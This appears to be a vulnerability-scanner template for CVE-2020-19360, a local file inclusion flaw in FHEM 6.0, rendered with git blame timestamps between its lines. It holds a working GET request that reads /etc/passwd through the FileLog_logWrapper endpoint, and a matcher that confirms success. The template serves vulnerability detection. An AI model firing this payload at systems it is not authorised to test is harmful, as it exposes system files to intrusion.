2021-11-13 03:35:48 +00:00
|
|
|
id: CVE-2020-19360
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-11-13 03:35:48 +00:00
|
|
|
info:
|
2022-05-09 16:12:52 +00:00
|
|
|
name: FHEM 6.0 - Local File Inclusion
|
2021-11-13 03:35:48 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
|
|
|
description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
|
|
|
|
reference:
|
|
|
|
- https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
|
|
|
|
- https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
|
2022-10-10 19:22:59 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-19360
|
2021-11-13 03:35:48 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2020-19360
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:fhem:fhem:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.08443
|
2021-11-13 18:04:22 +00:00
|
|
|
tags: fhem,lfi,cve,cve2020
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-11-13 03:35:48 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-13 03:35:48 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|